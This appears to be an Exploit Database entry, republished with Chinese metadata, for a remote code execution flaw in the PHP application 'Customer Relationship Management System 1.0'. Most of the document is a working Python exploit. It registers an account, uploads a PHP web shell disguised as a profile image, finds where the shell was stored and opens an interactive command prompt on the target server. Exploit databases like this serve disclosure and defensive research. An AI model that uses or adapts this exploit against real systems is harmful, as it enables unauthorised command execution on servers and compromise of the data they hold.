Customer Relationship Management System (CRM) 1.0 – Remote Code Execution

• Exploit Database
• 15 阅读

• 作者： Ishan Saha
  日期： 2021-06-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50046/

• # Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution
  # Date: 21.06.2021
  # Exploit Author: Ishan Saha
  # Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
  # Version: 1.x
  # Tested on: Ubuntu
  
  # REQUREMENTS # 
  # run pip3 install requests colorama beautifulsoup4
  
  # DESCRIPTION #
  
  ## Customer relationship management system is vulnerable to malicious file upload on account update option & customer create option
  
  ## Exploit Working:
  ## 1. Starting a session with the server 
  ## 2. Registering a user hackerctf : hackerctf and adding payload in image
  ## 3. Finding the uploaded file location in the username image tag 
  ## 4. Runing the payload fileto give a shell
  
  
  #!/usr/bin/python3
  import requests , time
  from bs4 import BeautifulSoup as bs
  from colorama import Fore, Back, Style
  
  # Variables : change the URL according to need
  URL="http://192.168.0.245/crm/" # CHANGE THIS 
  shellcode = "<?php system($_GET['cmd']);?>"
  filename = "shell.php"
  content_data = {"id":"","firstname":"ishan","lastname":"saha","username":"hackerctf","password":"hackerctf"}
  authdata={"username":"hackerctf","password":"hackerctf"}
  def format_text(title,item):
  cr = '\r\n'
  section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr 
  item=str(item)
  text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
  return text
  
  ShellSession = requests.Session()
  response = ShellSession.post(URL+"classes/Users.php?f=create_customer",data=content_data ,files={"img":(filename,shellcode,"application/php")})
  response = ShellSession.post(URL+"classes/Login.php?f=clogin",data=authdata)
  response = ShellSession.get(URL + "customer/")
  soup = bs(response.text,"html.parser")
  location= soup.find('img')['src']
  
  #print statements
  print(format_text("Target",URL),end='')
  print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
  print(format_text("shell location",location),end='')
  print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))
  
  while True:
  cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)
  if cmd == 'exit':
  break
  print(ShellSession.get(location + "?cmd="+cmd).content.decode())